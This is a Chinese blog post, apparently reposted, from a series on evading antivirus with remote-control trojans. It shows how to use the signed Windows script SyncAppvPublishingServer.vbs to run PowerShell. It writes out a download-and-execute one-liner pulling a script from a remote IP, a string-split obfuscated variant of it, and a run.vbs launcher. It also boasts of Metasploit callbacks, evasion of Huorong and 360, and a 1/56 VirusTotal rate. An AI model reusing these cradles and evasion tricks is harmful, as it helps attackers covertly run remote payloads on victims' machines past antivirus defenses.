【免杀篇】远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

其他 2020-05-29 10:06:33 阅读次数: 0

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

0x01 SyncAppvPublishingServer 简介

0x02 SyncAppvPublishingServer 使用

0x03 SyncAppvPublishingServer 执行payload

0x01 SyncAppvPublishingServer 简介

Windows上有两个版本的SyncAppVPublishingServer工具，它们是：SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。

0x02 SyncAppvPublishingServer 使用

在powershell下执行

SyncAppvPublishingServer.vbs break;powershell代码

测试过程中使用的是SyncAppvPublishingServer.vbs，SyncAppvPublishingServer.exe 没有成功

在cmd里是无法执行powershell命令的

该命令需要在powershell里进行执行

因此powershell脚本都可以通过SyncAppvPublishingServer.vbs来运行。

0x03 SyncAppvPublishingServer 执行payload

使用powershell木马。

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"

将powershell脚本进行混淆使用IEX远程加载执行payload。

$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)

msf可正常上线。

在实战中也可以直接写成vbs脚本 run.vbs

Set oShell=WScript.CreateObject("WScript.Shell")

oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

点击run.vbs也可以正常上线。

火绒、360均没有检测出

放在virustotal.com上a.bat查杀率为1/56

参考链接：

Powershell Without Powershell.exe

https://www.youtube.com/watch?v=sema3EYnP2c

虽然我们生活在阴沟里，但依然有人仰望星空！

猜你喜欢

转载自blog.csdn.net/God_XiangYu/article/details/106112588

【免杀篇】远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

【免杀篇】远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload

【免杀篇】远控免杀专题(48)-白名单pubprn.vbs执行payload

【免杀篇】远控免杀专题(62)-白名单CScript/WScript执行payload

【免杀篇】远控免杀专题(42)-白名单Regasm.exe/Regsvcs.exe执行payload

【免杀篇】远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload

【免杀篇】远控免杀专题(61)-白名单Te.exe执行payload

【免杀篇】远控免杀专题(60)-白名单Forfiles.exe执行payload

【免杀篇】远控免杀专题(59)-白名单Odbcconf.exe执行payload

【免杀篇】远控免杀专题(58)-白名单DiskShadow.exe执行payload

【免杀篇】远控免杀专题(57)-白名单Url.dll执行payload

【免杀篇】远控免杀专题(56)-白名单zipfldr.dll执行payload

【免杀篇】远控免杀专题(55)-白名单Pcalua.exe执行payload

【免杀篇】远控免杀专题(53)-白名单WMIC.exe执行payload

【免杀篇】远控免杀专题(52)-白名单psexec.exe执行payload

【免杀篇】远控免杀专题(51)-白名单msdeloy.exe执行payload

【免杀篇】远控免杀专题(50)-白名单winword.exe执行payload

【免杀篇】远控免杀专题(49)-白名单Xwizard.exe执行payload

【免杀篇】远控免杀专题(45)-白名单presentationhost.exe执行payload

【免杀篇】远控免杀专题(44)-白名单MavInject.exe执行payload

【免杀篇】远控免杀专题(43)-白名单Compiler.exe执行payload

【免杀篇】远控免杀专题(46)-白名单IEexec.exe执行payload(VT免杀率25-69)

【免杀篇】远控免杀专题(67)-白名单(113个)总结篇

【免杀篇】远控免杀专题(65)-shellcode免杀实践补充

【免杀篇】远控免杀专题(64)-Msf自编译免杀补充

远控免杀专题(19)-nps_payload免杀

远控免杀专题6---Venom免杀

远控免杀专题9 --- Avet免杀

远控免杀专题7 ---shellter免杀

远控免杀专题11-Avoidz免杀

今日推荐

富文本编辑器 Quill 2.0 重磅发布，特性、可靠性与开发者体验大幅提升

“开源信徒”周鸿祎开源360智脑大模型

周排行

Ubuntu 14.04 下Fuel6.0安装部署

香港一小巴侧翻致1死16伤警方：未见机件故障

pikachu--XSS盲打

阅读深入理解JVM虚拟机笔记一

java.sql.SQLException: ORA-00932: 数据类型不一致: 应为 -, 但却获得 CLOB

oracle delete all object under an user

[LeetCode]20 Valid Parentheses 有效的括号

树形DP求树的直径【模板】

Context propagation over HTTP in Go

【PAT】（B）1053 住房空置率 (20)*

每日归档

更多

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)

2024-04-15(42)

2024-04-14(0)

2024-04-13(119)

2024-04-12(38)

2024-04-11(14)

2024-04-10(68)

2024-04-09(5)